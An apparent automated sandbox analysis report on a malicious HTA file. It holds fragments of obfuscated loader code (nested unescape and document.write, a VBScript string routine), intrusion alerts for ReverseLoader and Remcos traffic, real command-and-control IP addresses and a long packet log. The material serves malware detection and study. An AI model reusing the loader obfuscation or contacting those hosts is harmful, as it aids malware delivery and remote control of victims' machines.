                                                                                                                                                                                                                              Preview:..........F.u.n.c.t.i.o.n. .a.t.r.o.c.e.m.e.n.t.e.(.B.y.V.a.l. .a.l.t.e.r.n.i.p.e.n.n.e.,. .B.y.V.a.l. .e.m.p.a.r.e.d.a.r.,. .B.y.V.a.l. .m.a.i.o.r.i.n.o.)..... . . . .D.i.m. .f.u.l.i.g.i.n.o.s.o..... . . . .f.u.l.i.g.i.n.o.s.o. .=. .I.n.S.t.r.(.a.l.t.e.r.n.i.p.e.n.n.e.,. .e.m.p.a.r.e.d.a.r.)..... . . . ..... . . . .D.o. .W.h.i.l.e. .f.u.l.i.g.i.n.o.s.o. .>. .0..... . . . . . . . .a.l.t.e.r.n.i.p.e.n.n.e. .=. .L.e.f.t.(.a.l.t.e.r.n.i.p.e.n.n.e.,. .f.u.l.i.g.i.n.o.s.o. .-. .1.). .&. .m.a.i.o.r.i.n.o. .&. .M.i.d.(.a.l.t.e.r.n.i.p.e.n.n.e.,. .f.u.l.i.g.i.n.o.s.o. .+. .L.e.n.(.e.m.p.a.r.e.d.a.r.).)..... . . . . . . . .f.u.l.i.g.i.n.o.s.o. .=. .I.n.S.t.r.(.f.u.l.i.g.i.n.o.s.o. .+. .L.e.n.(.m.a.i.o.r.i.n.o.).,. .a.l.t.e.r.n.i.p.e.n.n.e.,. .e.m.p.a.r.e.d.a.r.)..... . . . .L.o.o.p..... . . . ..... . . . .a.t.r.o.c.e.m.e.n.t.e. .=. .a.l.t.e.r.n.i.p.e.n.n.e.....E.n.d. .F.u.n.c.t.i.o.n.............p.r.i.v.a.t.e. .f.u.n.c.t.i.o.n. .R.e.a.d.S.t.d.I.n.(.)..... . . . .w.h.i.l.e. .N.o.t. .s.t.d.I.n...

                                                                                                                                                                                                                              C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp

                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                              Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):55
                                                                                                                                                                                                                              Entropy (8bit):4.306461250274409
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                                                                                                                                                                                                              MD5:DCA83F08D448911A14C22EBCACC5AD57
                                                                                                                                                                                                                              SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                                                                                                                                                                                                              SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                                                                                                                                                                                                              SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}

                                                                                                                                                                                                                              Static File Info

                                                                                                                                                                                                                              General

                                                                                                                                                                                                                              File type:HTML document, ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                                              Entropy (8bit):2.003189103245998
                                                                                                                                                                                                                              TrID:
                                                                                                                                                                                                                                File name:seethebestthingswhichhappenedentiretimewithgreattimebacktohere.hta
                                                                                                                                                                                                                                File size:182'592 bytes
                                                                                                                                                                                                                                MD5:2d71e3e87e2ea2945dcc2571b74fdb43
                                                                                                                                                                                                                                SHA1:a338df9a850b1c37528e1b517786285c216cf5e0
                                                                                                                                                                                                                                SHA256:0557fb02097645b6ec955298be44333a49f07f61dbcfdce99a78038f1cd4c1d4
                                                                                                                                                                                                                                SHA512:8e9fca6b445cbec531540059dac5e287cef1e1f53e0c1afde7480e9bba3a0e4f532f7637bbf0dc79c34d179c3524fdccfc87933b00abd117a0437c59807dbeab
                                                                                                                                                                                                                                SSDEEP:96:4vCl177OuKTWYEuKTGuC/TVjn0vflihuKTfuKTNAnuKTUQ:4vCld7OTTbETT5C/TCqTTfTTNeTTUQ
                                                                                                                                                                                                                                TLSH:1E04C961ED398CDCB3DC9A9776FC36D834BC834B97EB4E82811B7846E86238C90C0555
                                                                                                                                                                                                                                File Content Preview:<script language=JavaScript>m='%3Cscript%3E%0A%3C%21--%0Adocument.write%28unescape%28%22%253Cscript%253E%250A%253C%2521--%250Adocument.write%2528unescape%2528%2522%25253Cscript%25253E%25250A%25253C%252521--%25250Adocument.write%252528unescape%252528%25252

                                                                                                                                                                                                                                Network Behavior

                                                                                                                                                                                                                                Suricata IDS Alerts

                                                                                                                                                                                                                                TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                                                                                                2024-11-18T16:52:10.021973+01002858295ETPRO MALWARE ReverseLoader Base64 Encoded EXE With Content-Type Mismatch (text/plain)123.94.171.13880192.168.2.855648TCP
                                                                                                                                                                                                                                2024-11-18T16:52:23.601751+01002858795ETPRO MALWARE ReverseLoader Payload Request (GET) M21192.168.2.84970523.94.171.13880TCP
                                                                                                                                                                                                                                2024-11-18T16:52:38.759543+01002049038ET MALWARE ReverseLoader Reverse Base64 Loader In Image M21142.215.209.78443192.168.2.849706TCP
                                                                                                                                                                                                                                2024-11-18T16:52:56.510461+01002858796ETPRO MALWARE ReverseLoader Payload Request (GET) M11192.168.2.85564823.94.171.13880TCP
                                                                                                                                                                                                                                2024-11-18T16:52:56.864013+01002020424ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 2 M1123.94.171.13880192.168.2.855648TCP
                                                                                                                                                                                                                                2024-11-18T16:52:56.864013+01002020425ET EXPLOIT_KIT ReverseLoader Base64 Payload Inbound M2123.94.171.13880192.168.2.855648TCP
                                                                                                                                                                                                                                2024-11-18T16:53:21.663046+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.855649192.227.228.3614645TCP
                                                                                                                                                                                                                                2024-11-18T16:53:23.333996+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.855650192.227.228.3614645TCP
                                                                                                                                                                                                                                2024-11-18T16:53:23.817150+01002803304ETPRO MALWARE Common Downloader Header Pattern HCa3192.168.2.855651178.237.33.5080TCP
                                                                                                                                                                                                                                2024-11-18T16:53:23.948023+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.855652192.227.228.3614645TCP

                                                                                                                                                                                                                                Network Port Distribution

                                                                                                                                                                                                                                TCP Packets

                                                                                                                                                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                Nov 18, 2024 16:52:22.911870003 CET4970580192.168.2.823.94.171.138
                                                                                                                                                                                                                                Nov 18, 2024 16:52:22.917033911 CET804970523.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:22.917129040 CET4970580192.168.2.823.94.171.138
                                                                                                                                                                                                                                Nov 18, 2024 16:52:22.917340040 CET4970580192.168.2.823.94.171.138
                                                                                                                                                                                                                                Nov 18, 2024 16:52:22.922883034 CET804970523.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:23.601640940 CET804970523.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:23.601675987 CET804970523.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:23.601691008 CET804970523.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:23.601751089 CET4970580192.168.2.823.94.171.138
                                                                                                                                                                                                                                Nov 18, 2024 16:52:23.601784945 CET804970523.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:23.601785898 CET4970580192.168.2.823.94.171.138
                                                                                                                                                                                                                                Nov 18, 2024 16:52:23.601802111 CET804970523.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:23.601819038 CET804970523.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:23.601825953 CET4970580192.168.2.823.94.171.138
                                                                                                                                                                                                                                Nov 18, 2024 16:52:23.601838112 CET804970523.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:23.601857901 CET4970580192.168.2.823.94.171.138
                                                                                                                                                                                                                                Nov 18, 2024 16:52:23.601885080 CET4970580192.168.2.823.94.171.138
                                                                                                                                                                                                                                Nov 18, 2024 16:52:23.602257013 CET804970523.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:23.602279902 CET804970523.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:23.602303028 CET804970523.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:23.602303982 CET4970580192.168.2.823.94.171.138
                                                                                                                                                                                                                                Nov 18, 2024 16:52:23.602330923 CET4970580192.168.2.823.94.171.138
                                                                                                                                                                                                                                Nov 18, 2024 16:52:23.602360010 CET4970580192.168.2.823.94.171.138
                                                                                                                                                                                                                                Nov 18, 2024 16:52:23.606753111 CET804970523.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:23.606801033 CET804970523.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:23.606820107 CET4970580192.168.2.823.94.171.138
                                                                                                                                                                                                                                Nov 18, 2024 16:52:23.606852055 CET4970580192.168.2.823.94.171.138
                                                                                                                                                                                                                                Nov 18, 2024 16:52:23.720274925 CET804970523.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:23.720307112 CET804970523.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:23.720324039 CET804970523.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:23.720496893 CET804970523.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:23.720495939 CET4970580192.168.2.823.94.171.138
                                                                                                                                                                                                                                Nov 18, 2024 16:52:23.720495939 CET4970580192.168.2.823.94.171.138
                                                                                                                                                                                                                                Nov 18, 2024 16:52:23.720690966 CET804970523.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:23.720741987 CET4970580192.168.2.823.94.171.138
                                                                                                                                                                                                                                Nov 18, 2024 16:52:23.720783949 CET804970523.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:23.720951080 CET4970580192.168.2.823.94.171.138
                                                                                                                                                                                                                                Nov 18, 2024 16:52:23.720956087 CET804970523.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:23.720972061 CET804970523.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:23.720988035 CET804970523.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:23.721031904 CET4970580192.168.2.823.94.171.138
                                                                                                                                                                                                                                Nov 18, 2024 16:52:23.721129894 CET4970580192.168.2.823.94.171.138
                                                                                                                                                                                                                                Nov 18, 2024 16:52:23.721227884 CET804970523.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:23.721276999 CET4970580192.168.2.823.94.171.138
                                                                                                                                                                                                                                Nov 18, 2024 16:52:23.721316099 CET804970523.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:23.721503019 CET4970580192.168.2.823.94.171.138
                                                                                                                                                                                                                                Nov 18, 2024 16:52:23.721541882 CET804970523.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:23.721560001 CET804970523.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:23.721596956 CET4970580192.168.2.823.94.171.138
                                                                                                                                                                                                                                Nov 18, 2024 16:52:23.721678972 CET4970580192.168.2.823.94.171.138
                                                                                                                                                                                                                                Nov 18, 2024 16:52:23.721728086 CET804970523.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:23.721745014 CET804970523.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:23.721782923 CET4970580192.168.2.823.94.171.138
                                                                                                                                                                                                                                Nov 18, 2024 16:52:23.721798897 CET4970580192.168.2.823.94.171.138
                                                                                                                                                                                                                                Nov 18, 2024 16:52:23.722214937 CET804970523.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:23.722254992 CET804970523.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:23.722266912 CET4970580192.168.2.823.94.171.138
                                                                                                                                                                                                                                Nov 18, 2024 16:52:23.722270966 CET804970523.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:23.722294092 CET4970580192.168.2.823.94.171.138
                                                                                                                                                                                                                                Nov 18, 2024 16:52:23.722302914 CET4970580192.168.2.823.94.171.138
                                                                                                                                                                                                                                Nov 18, 2024 16:52:23.722522020 CET804970523.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:23.722541094 CET804970523.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:23.722606897 CET4970580192.168.2.823.94.171.138
                                                                                                                                                                                                                                Nov 18, 2024 16:52:23.722771883 CET4970580192.168.2.823.94.171.138
                                                                                                                                                                                                                                Nov 18, 2024 16:52:23.723059893 CET804970523.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:23.723110914 CET4970580192.168.2.823.94.171.138
                                                                                                                                                                                                                                Nov 18, 2024 16:52:23.723114967 CET804970523.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:23.723268986 CET4970580192.168.2.823.94.171.138
                                                                                                                                                                                                                                Nov 18, 2024 16:52:23.761450052 CET804970523.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:23.761554956 CET4970580192.168.2.823.94.171.138
                                                                                                                                                                                                                                Nov 18, 2024 16:52:23.761569023 CET804970523.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:23.761615992 CET4970580192.168.2.823.94.171.138
                                                                                                                                                                                                                                Nov 18, 2024 16:52:23.761965990 CET804970523.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:23.762015104 CET4970580192.168.2.823.94.171.138
                                                                                                                                                                                                                                Nov 18, 2024 16:52:23.762267113 CET804970523.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:23.762315035 CET4970580192.168.2.823.94.171.138
                                                                                                                                                                                                                                Nov 18, 2024 16:52:23.839653015 CET804970523.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:23.839672089 CET804970523.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:23.839761972 CET4970580192.168.2.823.94.171.138
                                                                                                                                                                                                                                Nov 18, 2024 16:52:23.839814901 CET804970523.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:23.839832067 CET804970523.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:23.839883089 CET4970580192.168.2.823.94.171.138
                                                                                                                                                                                                                                Nov 18, 2024 16:52:23.840024948 CET804970523.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:23.840039968 CET804970523.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:23.840056896 CET804970523.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:23.840063095 CET4970580192.168.2.823.94.171.138
                                                                                                                                                                                                                                Nov 18, 2024 16:52:23.840075970 CET4970580192.168.2.823.94.171.138
                                                                                                                                                                                                                                Nov 18, 2024 16:52:23.840099096 CET4970580192.168.2.823.94.171.138
                                                                                                                                                                                                                                Nov 18, 2024 16:52:23.840399027 CET804970523.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:23.840415001 CET804970523.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:23.840430021 CET804970523.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:23.840447903 CET804970523.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:23.840452909 CET4970580192.168.2.823.94.171.138
                                                                                                                                                                                                                                Nov 18, 2024 16:52:23.840466976 CET4970580192.168.2.823.94.171.138
                                                                                                                                                                                                                                Nov 18, 2024 16:52:23.840486050 CET4970580192.168.2.823.94.171.138
                                                                                                                                                                                                                                Nov 18, 2024 16:52:23.840857983 CET804970523.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:23.840873957 CET804970523.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:23.840889931 CET804970523.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:23.840909958 CET4970580192.168.2.823.94.171.138
                                                                                                                                                                                                                                Nov 18, 2024 16:52:23.840924025 CET4970580192.168.2.823.94.171.138
                                                                                                                                                                                                                                Nov 18, 2024 16:52:23.840930939 CET4970580192.168.2.823.94.171.138
                                                                                                                                                                                                                                Nov 18, 2024 16:52:23.841170073 CET804970523.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:23.841221094 CET4970580192.168.2.823.94.171.138
                                                                                                                                                                                                                                Nov 18, 2024 16:52:23.841274977 CET804970523.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:23.841290951 CET804970523.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:23.841317892 CET4970580192.168.2.823.94.171.138
                                                                                                                                                                                                                                Nov 18, 2024 16:52:23.841330051 CET4970580192.168.2.823.94.171.138
                                                                                                                                                                                                                                Nov 18, 2024 16:52:23.841635942 CET804970523.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:23.841650963 CET804970523.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:23.841665030 CET804970523.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:23.841681004 CET804970523.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:23.841681957 CET4970580192.168.2.823.94.171.138
                                                                                                                                                                                                                                Nov 18, 2024 16:52:23.841691971 CET4970580192.168.2.823.94.171.138
                                                                                                                                                                                                                                Nov 18, 2024 16:52:23.841711044 CET4970580192.168.2.823.94.171.138
                                                                                                                                                                                                                                Nov 18, 2024 16:52:23.841726065 CET4970580192.168.2.823.94.171.138
                                                                                                                                                                                                                                Nov 18, 2024 16:52:23.841983080 CET804970523.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:23.842037916 CET4970580192.168.2.823.94.171.138
                                                                                                                                                                                                                                Nov 18, 2024 16:52:23.842148066 CET804970523.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:23.842195988 CET4970580192.168.2.823.94.171.138
                                                                                                                                                                                                                                Nov 18, 2024 16:52:23.842391014 CET804970523.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:23.842437983 CET4970580192.168.2.823.94.171.138
                                                                                                                                                                                                                                Nov 18, 2024 16:52:23.881155014 CET804970523.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:23.881181002 CET804970523.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:23.881198883 CET804970523.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:23.881279945 CET4970580192.168.2.823.94.171.138
                                                                                                                                                                                                                                Nov 18, 2024 16:52:23.881306887 CET804970523.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:23.881330967 CET4970580192.168.2.823.94.171.138
                                                                                                                                                                                                                                Nov 18, 2024 16:52:23.881347895 CET4970580192.168.2.823.94.171.138
                                                                                                                                                                                                                                Nov 18, 2024 16:52:23.962219000 CET804970523.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:23.962280989 CET804970523.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:23.962280989 CET4970580192.168.2.823.94.171.138
                                                                                                                                                                                                                                Nov 18, 2024 16:52:23.962299109 CET804970523.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:23.962321997 CET4970580192.168.2.823.94.171.138
                                                                                                                                                                                                                                Nov 18, 2024 16:52:23.962341070 CET4970580192.168.2.823.94.171.138
                                                                                                                                                                                                                                Nov 18, 2024 16:52:23.962493896 CET804970523.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:23.962511063 CET804970523.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:23.962527037 CET804970523.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:23.962533951 CET4970580192.168.2.823.94.171.138
                                                                                                                                                                                                                                Nov 18, 2024 16:52:23.962544918 CET804970523.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:23.962554932 CET4970580192.168.2.823.94.171.138
                                                                                                                                                                                                                                Nov 18, 2024 16:52:23.962583065 CET4970580192.168.2.823.94.171.138
                                                                                                                                                                                                                                Nov 18, 2024 16:52:23.962636948 CET4970580192.168.2.823.94.171.138
                                                                                                                                                                                                                                Nov 18, 2024 16:52:23.962841988 CET804970523.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:23.962897062 CET4970580192.168.2.823.94.171.138
                                                                                                                                                                                                                                Nov 18, 2024 16:52:23.962954044 CET804970523.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:23.962990999 CET804970523.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:23.963001966 CET4970580192.168.2.823.94.171.138
                                                                                                                                                                                                                                Nov 18, 2024 16:52:23.963027954 CET4970580192.168.2.823.94.171.138
                                                                                                                                                                                                                                Nov 18, 2024 16:52:23.963151932 CET804970523.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:23.963167906 CET804970523.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:23.963193893 CET4970580192.168.2.823.94.171.138
                                                                                                                                                                                                                                Nov 18, 2024 16:52:23.963208914 CET4970580192.168.2.823.94.171.138
                                                                                                                                                                                                                                Nov 18, 2024 16:52:23.963326931 CET804970523.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:23.963341951 CET804970523.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:23.963357925 CET804970523.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:23.963372946 CET4970580192.168.2.823.94.171.138
                                                                                                                                                                                                                                Nov 18, 2024 16:52:23.963385105 CET4970580192.168.2.823.94.171.138
                                                                                                                                                                                                                                Nov 18, 2024 16:52:23.963402987 CET4970580192.168.2.823.94.171.138
                                                                                                                                                                                                                                Nov 18, 2024 16:52:23.963562012 CET804970523.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:23.963603973 CET4970580192.168.2.823.94.171.138
                                                                                                                                                                                                                                Nov 18, 2024 16:52:23.963660955 CET804970523.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:23.963676929 CET804970523.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:23.963702917 CET4970580192.168.2.823.94.171.138
                                                                                                                                                                                                                                Nov 18, 2024 16:52:23.963716030 CET4970580192.168.2.823.94.171.138
                                                                                                                                                                                                                                Nov 18, 2024 16:52:23.963917971 CET804970523.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:23.963934898 CET804970523.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:23.963952065 CET804970523.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:23.963973045 CET4970580192.168.2.823.94.171.138
                                                                                                                                                                                                                                Nov 18, 2024 16:52:23.964159966 CET804970523.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:23.964174986 CET804970523.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:23.964188099 CET4970580192.168.2.823.94.171.138
                                                                                                                                                                                                                                Nov 18, 2024 16:52:23.964190960 CET804970523.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:23.964204073 CET4970580192.168.2.823.94.171.138
                                                                                                                                                                                                                                Nov 18, 2024 16:52:23.964234114 CET4970580192.168.2.823.94.171.138
                                                                                                                                                                                                                                Nov 18, 2024 16:52:23.964485884 CET804970523.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:23.964534044 CET4970580192.168.2.823.94.171.138
                                                                                                                                                                                                                                Nov 18, 2024 16:52:23.998950958 CET804970523.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:23.999041080 CET804970523.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:23.999059916 CET804970523.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:23.999063015 CET4970580192.168.2.823.94.171.138
                                                                                                                                                                                                                                Nov 18, 2024 16:52:23.999079943 CET4970580192.168.2.823.94.171.138
                                                                                                                                                                                                                                Nov 18, 2024 16:52:23.999094009 CET4970580192.168.2.823.94.171.138
                                                                                                                                                                                                                                Nov 18, 2024 16:52:23.999238014 CET804970523.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:23.999254942 CET804970523.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:23.999281883 CET4970580192.168.2.823.94.171.138
                                                                                                                                                                                                                                Nov 18, 2024 16:52:23.999295950 CET4970580192.168.2.823.94.171.138
                                                                                                                                                                                                                                Nov 18, 2024 16:52:24.076226950 CET804970523.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:24.076273918 CET804970523.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:24.076276064 CET4970580192.168.2.823.94.171.138
                                                                                                                                                                                                                                Nov 18, 2024 16:52:24.076294899 CET804970523.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:24.076313019 CET4970580192.168.2.823.94.171.138
                                                                                                                                                                                                                                Nov 18, 2024 16:52:24.076325893 CET4970580192.168.2.823.94.171.138
                                                                                                                                                                                                                                Nov 18, 2024 16:52:24.076457024 CET804970523.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:24.076493025 CET4970580192.168.2.823.94.171.138
                                                                                                                                                                                                                                Nov 18, 2024 16:52:24.076577902 CET804970523.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:24.076596022 CET804970523.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:24.076617956 CET4970580192.168.2.823.94.171.138
                                                                                                                                                                                                                                Nov 18, 2024 16:52:24.076630116 CET4970580192.168.2.823.94.171.138
                                                                                                                                                                                                                                Nov 18, 2024 16:52:24.076807976 CET804970523.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:24.076824903 CET804970523.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:24.076841116 CET804970523.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:24.076845884 CET4970580192.168.2.823.94.171.138
                                                                                                                                                                                                                                Nov 18, 2024 16:52:24.076860905 CET804970523.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:24.076862097 CET4970580192.168.2.823.94.171.138
                                                                                                                                                                                                                                Nov 18, 2024 16:52:24.076881886 CET4970580192.168.2.823.94.171.138
                                                                                                                                                                                                                                Nov 18, 2024 16:52:24.076895952 CET4970580192.168.2.823.94.171.138
                                                                                                                                                                                                                                Nov 18, 2024 16:52:24.077323914 CET804970523.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:24.077342033 CET804970523.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:24.077356100 CET804970523.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:24.077372074 CET804970523.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:24.077383041 CET4970580192.168.2.823.94.171.138
                                                                                                                                                                                                                                Nov 18, 2024 16:52:24.077389956 CET804970523.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:24.077425957 CET4970580192.168.2.823.94.171.138
                                                                                                                                                                                                                                Nov 18, 2024 16:52:24.077805996 CET804970523.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:24.077848911 CET4970580192.168.2.823.94.171.138
                                                                                                                                                                                                                                Nov 18, 2024 16:52:24.077933073 CET804970523.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:24.077950001 CET804970523.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:24.077971935 CET4970580192.168.2.823.94.171.138
                                                                                                                                                                                                                                Nov 18, 2024 16:52:24.077989101 CET4970580192.168.2.823.94.171.138
                                                                                                                                                                                                                                Nov 18, 2024 16:52:24.078207970 CET804970523.94.171.138192.168.2.8
